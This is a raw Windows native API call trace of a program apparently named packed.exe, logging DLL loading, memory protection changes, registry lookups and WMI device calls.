 01235   748   NtProtectVirtualMemory  (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0
 01236   748   NtProtectVirtualMemory  (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0
 01237   748   NtFlushInstructionCache  (-1, 2012614656, 2076, ... ) == 0x0
 01238   748   NtProtectVirtualMemory  (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0
 01239   748   NtProtectVirtualMemory  (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0
 01240   748   NtFlushInstructionCache  (-1, 2012614656, 2076, ... ) == 0x0
 01241   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01242   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01243   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01244   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01245   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01246   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01247   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01248   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01249   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01250   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01251   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01252   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01253   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "Normaliz.dll"}, ... 100, ) }, ... 100, ) == 0x0
 01254   748   NtMapViewOfSection  (100, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0xdc0000), 0x0, 36864, ) == STATUS_IMAGE_NOT_AT_BASE
 01255   748   NtProtectVirtualMemory  (-1, (0xdc1000), 18944, 4, ... (0xdc1000), 20480, 32, ) == 0x0
 01256   748   NtProtectVirtualMemory  (-1, (0xdc7000), 1024, 4, ... (0xdc7000), 4096, 2, ) == 0x0
 01257   748   NtProtectVirtualMemory  (-1, (0xdc8000), 1536, 4, ... (0xdc8000), 4096, 2, ) == 0x0
 01258   748   NtMapViewOfSection  (100, -1, (0xdc0000), 0, 0, 0x0, 36864, 1, 0, 4, ... ) == STATUS_CONFLICTING_ADDRESSES
 01259   748   NtProtectVirtualMemory  (-1, (0xdc1000), 18944, 16, ... (0xdc1000), 20480, 4, ) == 0x0
 01260   748   NtProtectVirtualMemory  (-1, (0xdc7000), 1024, 2, ... (0xdc7000), 4096, 8, ) == 0x0
 01261   748   NtProtectVirtualMemory  (-1, (0xdc8000), 1536, 2, ... (0xdc8000), 4096, 8, ) == 0x0
 01262   748   NtFlushInstructionCache  (-1, 0, 0, ... ) == 0x0
 01263   748   NtClose  (100, ... ) == 0x0
 01264   748   NtProtectVirtualMemory  (-1, (0xdc1000), 160, 4, ... (0xdc1000), 4096, 16, ) == 0x0
 01265   748   NtProtectVirtualMemory  (-1, (0xdc1000), 4096, 16, ... (0xdc1000), 4096, 4, ) == 0x0
 01266   748   NtFlushInstructionCache  (-1, 14422016, 160, ... ) == 0x0
 01267   748   NtProtectVirtualMemory  (-1, (0xdc1000), 160, 4, ... (0xdc1000), 4096, 16, ) == 0x0
 01268   748   NtProtectVirtualMemory  (-1, (0xdc1000), 4096, 16, ... (0xdc1000), 4096, 4, ) == 0x0
 01269   748   NtFlushInstructionCache  (-1, 14422016, 160, ... ) == 0x0
 01270   748   NtProtectVirtualMemory  (-1, (0xdc1000), 160, 4, ... (0xdc1000), 4096, 16, ) == 0x0
 01271   748   NtProtectVirtualMemory  (-1, (0xdc1000), 4096, 16, ... (0xdc1000), 4096, 4, ) == 0x0
 01272   748   NtFlushInstructionCache  (-1, 14422016, 160, ... ) == 0x0
 01273   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01274   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01275   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01276   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "iertutil.dll"}, ... 100, ) }, ... 100, ) == 0x0
 01277   748   NtMapViewOfSection  (100, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x42990000), 0x0, 282624, ) == 0x0
 01278   748   NtClose  (100, ... ) == 0x0
 01279   748   NtProtectVirtualMemory  (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0
 01280   748   NtProtectVirtualMemory  (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0
 01281   748   NtFlushInstructionCache  (-1, 1117327360, 616, ... ) == 0x0
 01282   748   NtProtectVirtualMemory  (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0
 01283   748   NtProtectVirtualMemory  (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0
 01284   748   NtFlushInstructionCache  (-1, 1117327360, 616, ... ) == 0x0
 01285   748   NtProtectVirtualMemory  (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0
 01286   748   NtProtectVirtualMemory  (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0
 01287   748   NtFlushInstructionCache  (-1, 1117327360, 616, ... ) == 0x0
 01288   748   NtProtectVirtualMemory  (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0
 01289   748   NtProtectVirtualMemory  (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0
 01290   748   NtFlushInstructionCache  (-1, 1117327360, 616, ... ) == 0x0
 01291   748   NtProtectVirtualMemory  (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0
 01292   748   NtProtectVirtualMemory  (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0
 01293   748   NtFlushInstructionCache  (-1, 1117327360, 616, ... ) == 0x0
 01294   748   NtProtectVirtualMemory  (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0
 01295   748   NtProtectVirtualMemory  (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0
 01296   748   NtFlushInstructionCache  (-1, 1117327360, 616, ... ) == 0x0
 01297   748   NtProtectVirtualMemory  (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0
 01298   748   NtProtectVirtualMemory  (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0
 01299   748   NtFlushInstructionCache  (-1, 1119948800, 1452, ... ) == 0x0
 01300   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHLWAPI.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01301   748   NtOpenKey  (0x2000000, {24, 16, 0x40, 0, 0,  (0x2000000, {24, 16, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Performance"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01302   748   NtCreateSemaphore  (0x1f0003, {24, 48, 0x80, 1376224, 0,  (0x1f0003, {24, 48, 0x80, 1376224, 0, "shell.{A48F1A32-A340-11D1-BC6B-00A0C90312E1}"}, 0, 2147483647, ... 100, ) }, 0, 2147483647, ... 100, ) == STATUS_OBJECT_NAME_EXISTS
 01303   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Normaliz.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01304   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iertutil.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01305   748   NtQueryPerformanceCounter  (... {925535060, 10}, {3579545, 0}, ) == 0x0
 01306   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wininet.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01307   748   NtQueryPerformanceCounter  (... {925535653, 10}, {3579545, 0}, ) == 0x0
 01308   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01309   748   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 14483456, 1048576, ) == 0x0
 01310   748   NtAllocateVirtualMemory  (-1, 14483456, 0, 4096, 4096, 4, ... 14483456, 4096, ) == 0x0
 01311   748   NtAllocateVirtualMemory  (-1, 14487552, 0, 8192, 4096, 4, ... 14487552, 8192, ) == 0x0
 01312   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 92, ) == 0x0
 01313   748   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1239800,  (0xc0100080, {24, 0, 0x40, 0, 1239800, "\??\WMIDataDevice"}, 0x0, 128, 0, 1, 64, 0, 0, ... 112, {status=0x0, info=0}, ) }, 0x0, 128, 0, 1, 64, 0, 0, ... 112, {status=0x0, info=0}, ) == 0x0
 01314   748   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 116, ) == 0x0
 01315   748   NtDeviceIoControlFile  (112, 116, 0x0, 0x12eb58, 0x22414c,  (112, 116, 0x0, 0x12eb58, 0x22414c, "\240\353\22\0\0\0\0\0\1\0\0\0\2\0\0\0\24\0\0\0\34\0\0\0P\0\0\0\0\0\0\0L\0\0\0\0\0\0\0\2\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#\0\20\10\0\0\0\0\0\0\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#\0\0\10\0\0\0\0\0\0\0\0\0\2\0\0\0", 104, 80, ... , 104, 80, ...
 01316   748   NtOpenKey  (0x82000000, {24, 0, 0x240, 0, 0,  (0x82000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\WMI\Security"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 01317   748   NtQueryValueKey  (-2147482740,  (-2147482740, "DF8480A1-7492-4F45-AB78-1084642581FB", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01318   748   NtQueryValueKey  (-2147482740,  (-2147482740, "00000000-0000-0000-0000-000000000000", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01319   748   NtClose  (-2147482740, ... ) == 0x0
 01320   748   NtClose  (908, ... ) == 0x0
 01315   748   NtDeviceIoControlFile  ... {status=0x0, info=80},  ... {status=0x0, info=80}, "\208\325\341\0\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#o\0\377\341CMDa\0\0\0\0\0\0\0\0\2\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#\0\20\10\0x\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0
 01321   748   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1240016,  (0xc0100080, {24, 0, 0x40, 0, 1240016, "\??\WMIDataDevice"}, 0x0, 128, 0, 1, 64, 0, 0, ... 124, {status=0x0, info=0}, ) }, 0x0, 128, 0, 1, 64, 0, 0, ... 124, {status=0x0, info=0}, ) == 0x0
 01322   748   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 128, ) == 0x0
 01323   748   NtDuplicateObject  (-1, -1, -1, 0x0, 0, 2, ... 132, ) == 0x0
 01324   748   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 136, ) == 0x0
 01325   748   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 140, ) == 0x0
 01326   748   NtAllocateVirtualMemory  (-1, 14495744, 0, 8192, 4096, 4, ... 14495744, 8192, ) == 0x0
 01327   748   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 15532032, 1048576, ) == 0x0
 01328   748   NtAllocateVirtualMemory  (-1, 16572416, 0, 8192, 4096, 4, ... 16572416, 8192, ) == 0x0
 01329   748   NtProtectVirtualMemory  (-1, (0xfce000), 4096, 260, ... (0xfce000), 4096, 4, ) == 0x0
 01330   748   NtCreateThread  (0x1f03ff, 0x0, -1, 1239100, 1239044, 1, ... 144, {484, 1480}, ) == 0x0
 01331   748   NtQueryInformationThread  (144, Basic, 28, ... {ExitStatus=0x103,TebBaseAddress=0x7ffdd000,Pid=484,Tid=1480,}, 0x0, ) == 0x0
 01332   748   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 0, 0, 0, 14483832}  (24, {28, 56, new_msg, 0, 0, 0, 0, 14483832} "\0\0\0\0\1\0\1\0\0\0\0\0(\2\0\0\220\0\0\0\344\1\0\0\310\5\0\0" ... {28, 56, reply, 0, 484, 748, 58138, 0} "\0\0\0\0\1\0\1\0\0\0\0\0(\2\0\0\220\0\0\0\344\1\0\0\310\5\0\0" )  ... {28, 56, reply, 0, 484, 748, 58138, 0}  (24, {28, 56, new_msg, 0, 0, 0, 0, 14483832} "\0\0\0\0\1\0\1\0\0\0\0\0(\2\0\0\220\0\0\0\344\1\0\0\310\5\0\0" ... {28, 56, reply, 0, 484, 748, 58138, 0} "\0\0\0\0\1\0\1\0\0\0\0\0(\2\0\0\220\0\0\0\344\1\0\0\310\5\0\0" )  ) == 0x0
 01333   748   NtResumeThread  (144, ... 1, ) == 0x0
 01334  1480   NtCreateEvent  (0x100003, 0x0, 1, 0, ... 148, ) == 0x0
 01335  1480   NtWaitForSingleObject  (148, 0, 0x0, ...
 01336   748   NtClose  (144, ... ) == 0x0
 01337   748   NtSetEvent  (128, ... 0x0, ) == 0x0
 01338   748   NtSetEvent  (92, ... 0x0, ) == 0x0
 01339   748   NtClose  (92, ... ) == 0x0
 01340   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 92, ) == 0x0
 01341   748   NtAllocateVirtualMemory  (-1, 14503936, 0, 4096, 4096, 4, ... 14503936, 4096, ) == 0x0
 01342   748   NtDeviceIoControlFile  (112, 116, 0x0, 0x12eb58, 0x22414c,  (112, 116, 0x0, 0x12eb58, 0x22414c, "\240\353\22\0\0\0\0\0\2\0\0\0\2\0\0\0\24\0\0\0\34\0\0\0P\0\0\0\0\0\0\0L\0\0\0\0\0\0\0\2\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344\0\20\10\0\0\0\0\0\0\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344\0\0\10\0\0\0\0\0\0\0\0\0\2\0\0\0", 104, 80, ... , 104, 80, ...
 01343   748   NtOpenKey  (0x82000000, {24, 0, 0x240, 0, 0,  (0x82000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\WMI\Security"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 01344   748   NtQueryValueKey  (-2147482740,  (-2147482740, "DF8480A1-7492-4F45-AB78-1084642581FB", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01345   748   NtQueryValueKey  (-2147482740,  (-2147482740, "00000000-0000-0000-0000-000000000000", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01346   748   NtClose  (-2147482740, ... ) == 0x0
 01347   748   NtClose  (908, ... ) == 0x0
 01342   748   NtDeviceIoControlFile  ... {status=0x0, info=80},  ... {status=0x0, info=80}, "\250\205\362\341\0\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344o\0\1\11\20\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344\0\20\10\0\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0
 01348   748   NtSetEvent  (128, ... 0x0, ) == 0x0
 01349   748   NtSetEvent  (92, ... 0x0, ) == 0x0
 01350   748   NtClose  (92, ... ) == 0x0
 01351   748   NtOpenThreadToken  (-2, 0x8, 0, ... ) == STATUS_NO_TOKEN
 01352   748   NtOpenProcessToken  (-1, 0xa, ... 92, ) == 0x0
 01353   748   NtDuplicateToken  (92, 0xc, {24, 0, 0x0, 0, 1240284, 0x0}, 0, 2, ... 152, ) == 0x0
 01354   748   NtClose  (92, ... ) == 0x0
 01355   748   NtAccessCheck  (1382048, 152, 0x1, 1240360, 1240412, 56, 1240392, ... (0x1), ) == 0x0
 01356   748   NtClose  (152, ... ) == 0x0
 01357   748   NtQueryDefaultUILanguage  (1239164, ...
 01358   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01359   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482740, ) == 0x0
 01360   748   NtQueryInformationToken  (-2147482740, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01361   748   NtClose  (-2147482740, ... ) == 0x0
 01362   748   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 01363   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x240, 0, 0,  (0x80000000, {24, -2147482740, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01364   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x640, 0, 0,  (0x80000000, {24, -2147482740, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481372, ) }, ... -2147481372, ) == 0x0
 01365   748   NtQueryValueKey  (-2147481372,  (-2147481372, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01366   748   NtClose  (-2147481372, ... ) == 0x0
 01367   748   NtClose  (-2147482740, ... ) == 0x0
 01357   748   NtQueryDefaultUILanguage  ... ) == 0x0
 01368   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wininet.dll.123.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01369   748   NtQueryDefaultLocale  (1, 1237260, ... ) == 0x0
 01370   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wininet.dll.123.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01371   748   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 2088850039, 1238296, 1179817, 1238020}  (24, {128, 156, new_msg, 0, 2088850039, 1238296, 1179817, 1238020} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\14\351\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58226, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\14\351\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 484, 748, 58226, 0}  (24, {128, 156, new_msg, 0, 2088850039, 1238296, 1179817, 1238020} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\14\351\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58226, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\14\351\22\0\0\0\0\0" )  ) == 0x0
 01372   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01373   748   NtOpenKey  (0x8, {24, 0, 0x40, 0, 0,  (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01374   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01375   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01376   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1236488, ... ) }, 1236488, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01377   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01378   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01379   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01380   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 1236552, ... ) }, 1236552, ... ) == 0x0
 01381   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 3, 33, ... 152, {status=0x0, info=1}, ) }, 3, 33, ... 152, {status=0x0, info=1}, ) == 0x0
 01382   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01383   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll"}, 5, 96, ... 92, {status=0x0, info=1}, ) }, 5, 96, ... 92, {status=0x0, info=1}, ) == 0x0
 01384   748   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 92, ... 156, ) == 0x0
 01385   748   NtClose  (92, ... ) == 0x0
 01386   748   NtMapViewOfSection  (156, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xfe0000), 0x0, 1056768, ) == 0x0
 01387   748   NtClose  (156, ... ) == 0x0
 01388   748   NtUnmapViewOfSection  (-1, 0xfe0000, ... ) == 0x0
 01389   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll"}, 5, 96, ... 156, {status=0x0, info=1}, ) }, 5, 96, ... 156, {status=0x0, info=1}, ) == 0x0
 01390   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 156, ... 92, ) == 0x0
 01391   748   NtQuerySection  (92, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01392   748   NtClose  (156, ... ) == 0x0
 01393   748   NtMapViewOfSection  (92, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x773d0000), 0x0, 1060864, ) == 0x0
 01394   748   NtClose  (92, ... ) == 0x0
 01395   748   NtProtectVirtualMemory  (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0
 01396   748   NtProtectVirtualMemory  (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0
 01397   748   NtFlushInstructionCache  (-1, 2000490496, 1924, ... ) == 0x0
 01398   748   NtProtectVirtualMemory  (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0
 01399   748   NtProtectVirtualMemory  (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0
 01400   748   NtFlushInstructionCache  (-1, 2000490496, 1924, ... ) == 0x0
 01401   748   NtProtectVirtualMemory  (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0
 01402   748   NtProtectVirtualMemory  (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0
 01403   748   NtFlushInstructionCache  (-1, 2000490496, 1924, ... ) == 0x0
 01404   748   NtProtectVirtualMemory  (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0
 01405   748   NtProtectVirtualMemory  (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0
 01406   748   NtFlushInstructionCache  (-1, 2000490496, 1924, ... ) == 0x0
 01407   748   NtProtectVirtualMemory  (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0
 01408   748   NtProtectVirtualMemory  (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0
 01409   748   NtFlushInstructionCache  (-1, 2000490496, 1924, ... ) == 0x0
 01410   748   NtProtectVirtualMemory  (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0
 01411   748   NtProtectVirtualMemory  (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0
 01412   748   NtFlushInstructionCache  (-1, 2000490496, 1924, ... ) == 0x0
 01413   748   NtProtectVirtualMemory  (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0
 01414   748   NtProtectVirtualMemory  (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0
 01415   748   NtFlushInstructionCache  (-1, 2000490496, 1924, ... ) == 0x0
 01416   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\comctl32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01417   748   NtAddAtom  ( ("T\0h\0e\0m\0e\0P\0r\0o\0p\0S\0c\0r\0o\0l\0l\0B\0a\0r\0C\0t\0l\0", 42, 1238032, ... ) , 42, 1238032, ... ) == 0x0
 01418   748   NtQueryDefaultUILanguage  (1236716, ...
 01419   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01420   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482740, ) == 0x0
 01421   748   NtQueryInformationToken  (-2147482740, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01422   748   NtClose  (-2147482740, ... ) == 0x0
 01423   748   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147482740, ) }, ... -2147482740, ) == 0x0
 01424   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x240, 0, 0,  (0x80000000, {24, -2147482740, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
